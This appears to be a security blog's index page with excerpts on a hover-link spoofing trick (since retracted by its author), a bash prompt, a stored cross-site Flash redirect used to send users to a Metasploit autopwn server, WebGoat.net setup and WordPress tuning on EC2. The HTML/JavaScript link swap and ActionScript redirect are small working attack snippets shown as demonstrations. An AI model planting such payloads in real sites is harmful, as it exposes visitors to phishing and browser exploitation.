Always “Hover” Before You Click!? Wrong.

RETRACTION: So, sometimes I am wrong. This attack does work, but it’s irrelevant, and here’s why: if someone has control of the DOM the game is already over, there’s nothing the browser can do for you in that case. It doesn’t really matter that the hover-status can be spoofed at that point. I’ll leave the post up so you can marvel in my stupid, but to summarize–nothing to see here. (At least I’m not throwing banner ads at you.) Also, my apologies to those whose comments were here, when I moved off of wordpress I decided that a comment system wasn’t something I wanted to retain on my blog, and during the move none of the existing comments were imported into the new site.
One of the things you hear frequently is to be aware of what you are clicking on when you surf.  That you should “hover” over the link before clicking it to make sure it goes where you think it does.  Hell, I’ve personally given this very advice to people who clicked on something stupid. I guess I’m a liar.  Because it isn’t true. I actually put five minutes into thinking about this very advice today, because something didn’t sit right with me about that statement.  It took all of a minute to throw some html and javascript together that gets past it.  Maybe everyone already knows this, and somehow I was asleep on the day that it was being covered in the literally hundreds of papers, articles, howtos, books, and presentations I’ve attended, read, or skimmed.  Your browser will show you what the link is when you hover over it.  But that doesn’t mean that the link is the same by the time you have released your mouse click.
(onclick.html) download
1
2
3
4
5
6
7
8
9
10
11
<!doctype html>
<head>
<script>
        function tricked() {
                document.getElementById("naughty").href="http://www.frameloss.org";
        }
</script>
</head>
<body>
<a href="http://www.google.com" onclick="tricked()" id="naughty">www.google.com</a>
</body>
Honestly, I don’t know why this simple attack is allowed to work … browsers should not allow the href to be modified on a link with the onClick handler. Want to see it in action?  Here’s a link to the above code.

Yet Another Neat $PS1 Prompt for Bash

(With  google returning more than a million hits for the search “bash PS1”, it may be a little presumptive that I have anything to add to the conversation, but this was an interesting exercise for me, so I’ll share it anyways.  Besides this may actually be my most nitpicky *nix nerd post yet.) Here’s my brand new … super-duper space-saving, non-forking, color-changing PS1 prompt (that doesn’t mess up readline!)
export PS1='[\[\e[$(((($?>0))*31))m\]\h:\W\[\e[00m\]]\$ '
I happened across a blog post (8 Useful and Interesting Bash Prompts) covering different PS1 prompts that people are using.  I hadn’t thought of it before, but the first prompt ”Show Happy face upon successful execution“ caught my attention because I write a lot of scripts, and of those many are used by other programs–so return codes are important, and not something I always remember to check.  I hadn’t thought of it before, but I liked the idea! Anyways, it got me thinking about how it works … a lot of the fancy PS1 formulas you see out there are running several commands (even if it isn’t obvious–generally if a bracket or tick is involved, there’s a subshell forking out.)  When your system is grinding to a halt, every fork counts.  So I don’t like the idea of running an additional shell script every time I press enter. So, the example that Joshua Price provides, while really cool, adds extra forks every time you hit the return key.  This is pretty easy to demonstrate using bash’s “set -x” command:

Each one of those ”++” signs you see is a new process being created.  I’m a bit of an efficiency freak, so I don’t like that. Curiosity got the better of me, and I somehow decided that I would achieve the same end (return status indication within PS1) without a single forked process.  So I went about modifying my (now previously) favorite PS1 prompt … the ultra-simple: Read full post →

Stored Cross-site Flashing?

The title for this post posed somewhat of a conundrum for me. That’s because I think technically, cross-site flashing is more about attacking a flash applet that already lives on a website.  But what if you are allowed to add one to said website?  Is attacking the document object model through an uploaded flash applet still cross-site flashing, is it stored cross-site scripting, or should it be called stored cross-site flashing?  I’m sure there really is a definition somewhere that at least two people have agreed upon. Anyways, I was looking at a web application that implemented pretty good cross-site scripting protection, it even uses the OWASP Antisamy libraries to sanitize untrusted data that is stored in the application. But with all that work in place it still allowed users to specify a location for a flash applet, but it didn’t actually allow the user to upload said applet to the server via the WYSIWYG editor I was attacking.  And I assume that the developers thought that this was sufficient to protect users, because it would cause the browser to enforce same origin policies against the remote flash applet.  (Not to mention someone could just point the object tag directly to a SWF file that started throwing exploits at Flash Player, cross-origin policy be damned.)  There were however other places in the application that a user could upload to though, even if not directly in the WYSIWYG editor.  So referencing these other locations was a simple task, just paste in the URL! I have theorized about using a similar attack vector for a while (because, it’s pretty obvious.) Of course I realize this attack isn’t anything unique by any means, but I wasn’t able to find any easy steps to do it … ultimately my goal was to redirect to a metasploit autopwn instance and do a demo of how this could be used to compromise systems.  The best part was that the flash object tag was actually getting embedded in a iframe inside of the main page, which made all this look totally innocent on the browser getting attacked.  So I compiled the following ActionScript 3 code using as3compile (from the swftools suite,) and it worked perfectly!
(cross-site-flash.as) download
1
2
3
4
5
6
7
8
9
10
11
12
13
package
{
 import flash.display.MovieClip
 import flash.net.*
 public class Main extends MovieClip
 {
 function Main() {
 var url:String = "CHANGE_TO_TARGET_URL";
 var urlReq:URLRequest = new URLRequest(url);
 navigateToURL(urlReq,"_self");
 }
 }
}

Installing WebGoat.net Using Apache on Ubuntu

At the recent OWASP Snowfroc conference in Denver, Jerry Hoff presented a new OWASP project called WebGoat.net, a .NET application designed for training classes.  It is designed to run on Linux using the Apache web server.  You can probably easily also run it on nginx or even IIS on Windows if you were so inclined.  I wanted to play with the application, and since setup instructions weren’t available on the site I had to figure it out.  It is really quite simple.  The following are basic instructions on how to get it running on Ubuntu Server 12.

  Read full post →

Making WordPress Stable on EC2-Micro

EC2 Micro Instance Limitations

EC2 offers a lot of advantages over many web site hosting options.  I am a bit of a control freak and like having full control over my web server.  This has advantages and disadvantages of course, meaning more work but more flexibility.  Running a WordPress blog on a micro instance can be a serious challenge.  I have fought with getting my site to have a minimum level of stability, and here are some of my notes on what helped.  Amazon offers a free EC2 micro instance for a year to new users, so it is a very attractive option for hosting a web site. The EC2 micro instance is pretty cheap compared to the other system options that Amazon offers, but there are some caveats that may shock you after using it for a while.  There are a couple of major problems with using this option for hosting a website:
  • CPU Usage restrictions: If you use 100% CPU for more than a few minutes, Amazon will “steal” CPU time from the instance, meaning that they throttle your instance.  This can last (from my observations) as long as five minutes, and then you get a few seconds of 100% again, then the restrictions are back.  This will cripple your website, making it slow, and even timing-out requests.
  • Limited Memory: The instance is limited to 613MB of RAM, and does not have a swap partition.  If you run out of memory the system will panic and reboot.
Here is one symptom of CPU throttling from EC2, looking at the CPU usage from the “top” command:
According to the top man page: ”st = steal (time given to other DomU instances)
  If you have more than 1000 visitors or so a day, a micro instance probably isn’t worth your time.  But for many small sites (like mine) it does make sense.  I wasn’t aware of these limitations before setting up my site, and I very quickly ran into site reliability issues.  Here are a few of the things that I did to make my site more stable. You can save a lot of money by purchasing a reserved instance for a year, but my advice is to run for a few months before making the leap.  If you find that your micro instance doesn’t cut it, you have just thrown away a chunk of cash. So, let’s look at a few of the things you can do to make a WordPress site run reasonably well on a Micro Instance:
  • Configuration:
    • Tune Apache to run the correct number of threads.
    • Use the minimum required memory for MySQL.
    • Pre-cache your web pages.
    • Use a content distribution network (CDN) such as CloudFront.
    • Setup a swap partition.
  • Reacting to site overload:
    • Configure alerting for CPU usage and network traffic.
    • Be ready to rent a larger instance if you get a big traffic spike.
      • Use a 32 bit operating system.

Read full post →